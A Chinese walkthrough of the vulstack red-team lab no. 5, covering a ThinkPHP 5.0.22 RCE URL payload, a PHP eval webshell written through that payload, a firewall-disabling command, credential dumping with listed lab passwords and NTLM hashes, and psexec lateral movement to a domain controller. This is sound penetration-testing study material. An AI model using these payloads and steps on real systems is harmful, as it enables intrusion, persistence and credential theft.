[ 内网渗透 ] vulstack红队评估(五)

简介: 根据作者公开的靶机信息整理

一、环境搭建:

①根据作者公开的靶机信息整理

虚拟机密码:

Win7:



heart 123.com    #本地管理员用户
sun\Administrator dc123.com    #域管用户,改为了panda123..

 

Win2008:


sun\admin 2020.com    #由于需要改密码,我更改为panda666...

 

②虚拟机网卡设置

Win7双网卡模拟内外网:

外网:桥接模式与物理机相通

内网:根据公开截图是:192.168.138.136,仅主机模式

 

利用管理员账号登进win7,并将其中一个网卡ip设置为桥接模式的网段ip:192.168.1.136

 

Win2008只通内网不通外网:

内网:根据公开截图是:192.168.138.138,仅主机模式

 

 

③整体环境梳理

靶机:

Win7:192.168.1.136(外网),192.168.138.136(内网)

Win2008:192.168.138.138(内网)

 

攻击机:

kali:192.168.1.2

win10:192.168.1.7

 

利用本地管理员heart登陆win7,并开启phpstudy,启动web环境:

 


二、web层渗透:

0x01 前期信息收集与漏洞利用:

①端口、服务探测:


nmap 192.168.1.136 -T4 -A -sV

 


②初探web

发现开启了80和3306,访问80端口的http服务,发现是thinkphp

 

 

 

③thinkphp rce一把梭

随便输入路径,让其报错,发现是5.0.22版本

 

直接去搜索历史漏洞,看下有没有可以直接getshell的,不难找到exp,而且直接RCE了


?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

④getshell

然后直接利用echo写入一句话方便后续操作,由于是靶机环境,不考虑免杀,实战中可能需要免杀一句话


?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php eval($_POST[cmd]);?^> > shell.php

直接利用蚁剑连接webshell

 


0x02 目标本机信息收集

①发现目标有两个ip,并且存在域sun.com,DNS服务器为192.168.138.138,基本上DNS服务器就是域控

 

查看进程信息,并没有发现杀软

那么目标肯定是横向移动,最终拿下这台域控了,这里为了熟悉Cobaltstrike,所有的内网渗透操作将利用cs完成,并且不存在杀软,就不用考虑免杀了,毕竟是靶机嘛emmm...

 

 


三、内网横向渗透

0x01 让目标主机上线

①使用web_delivery的方式,生成powershell命令


虚拟终端执行payload

 

稍等一会就看见cs上线了


0x02 提权

①设置心跳时间为1s,查看当前权限为管理员权限,为了后续更好操作,提权至system


②查看补丁情况,并分析可利用漏洞提权exp


shell systeminfo


windows提权辅助脚本提示存在MS15-051


③利用CS一键提权


提权成功返回一个system权限的beacon

 


0x03 内网横向移动

①查看防火墙情况,发现是开启状态


shell netsh firewall show state

 

为了方便操作,将防火墙关闭


shell netsh advfirewall set allprofiles state off


②内网常规信息收集

当前域内计算机列表:

 

域控列表:


用户列表:

 

③抓取凭证hash



抓取到的全部明文密码、ntlm hash

 

 

④上线域用户leo

Spawn As派生会话

 


选择leo的凭证

 

成功拿到leo的beacon

 


⑤继续收集域内信息


net user \\192.168.138.138

 

又发现多了一个admin用户

 

⑥信息汇总整理:









域名:sun.com
域控:192.168.138.138,机器名:DC
域内机器:192.168.138.136(win7)、192.168.138.138(DC)
所有用户:
非域:heart:123.com;ntlm:afffeba176210fad4628f0524bfe1942
域内用户:sun\administrator(域管):panda123..;ntml:31d6cfe0d16ae931b73c59d7e0c089c0
sun\leo:123.com;ntml:afffeba176210fad4628f0524bfe1942
sun\admin(未知)
krbtgt(未知)


 

0x04 攻击域控

①网络环境分析

边界机win7可通外网、内网,域控只能与win7通信,不能出网,所以想要拿到DC权限,可以通过:

1.psexec配合SMB beacon上线DC机器

2.link Listener+IPC$连接上马

 

②横向psexec拿下DC beacon


选择域管凭证,并选择smb beacon的监听器,选择一个会话进行横向移动,点击choose

 


成功利用域管账号拿下DC的smb beacon


③导出域内所有hash


 

四、总结

0x01 总体内网拓扑


0x02 整体思路

1.端口探测发现80端口web服务,利用thinkphp 5.0.22 rce漏洞getshell

2.简单主机信息收集发现双网卡,判断存在内网环境,并且有域

3.配合windows检测脚本,判断出可利用exp,并利用cs进行提权

4.内网、域常规信息收集,并关闭了防火墙方便后续操作

5.通过凭证hash获取到域用户、域管、其他用户的密码、hash

6.利用抓取到的域管凭证+psexec进行横向到域控

7.经过分析当前网络情况发现域控并不能出网,所以通过SMB beacon+psexec进行横向,最终拿下域控


目录
相关文章
|
3月前
|
SQL 安全 网络协议
黑盒渗透测试:揭开未知的安全隐患
【8月更文挑战第31天】
120 0
|
5月前
|
安全 测试技术 网络安全
网络安全中的渗透测试与风险评估:技术深度解析
【7月更文挑战第3天】在网络安全领域,渗透测试和风险评估是两种不可或缺的技术手段。通过模拟黑客的攻击手段来发现系统中的安全漏洞,以及通过系统性的方法来识别和评估潜在的风险和威胁,两者共同为组织提供了全面的网络安全保障。随着技术的不断发展和网络环境的日益复杂,渗透测试和风险评估的重要性将日益凸显。因此,网络安全从业者应不断学习和掌握这两种技术,以应对日益严峻的网络安全挑战。
|
6月前
|
安全 网络安全 数据安全/隐私保护
关于双面恶魔攻击的定义、检测和预防的最佳实践
关于双面恶魔攻击的定义、检测和预防的最佳实践
|
安全 Oracle 网络协议
[内网渗透] vulstack红队评估(二)
根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX
182 0
|
存储 安全 网络协议
[内网渗透]vulstack红队评估(一)
根据作者公开的靶机信息整理: 虚拟机初始所有统一密码:hongrisec@2019 因为登陆前要修改密码,改为了panda666...
217 0
|
安全 Ubuntu Shell
vulstack红队评估(四)
根据作者公开的靶机信息整理
194 0
|
Ubuntu 安全 网络协议
vulstack红队评估(三)
一共是5台机器,目标是拿下域控获取flag文件
243 0
|
机器学习/深度学习 人工智能 算法
Nat. Med. | 制定指导原则以报告AI在临床试验中的使用
Nat. Med. | 制定指导原则以报告AI在临床试验中的使用
138 0
Nat. Med. | 制定指导原则以报告AI在临床试验中的使用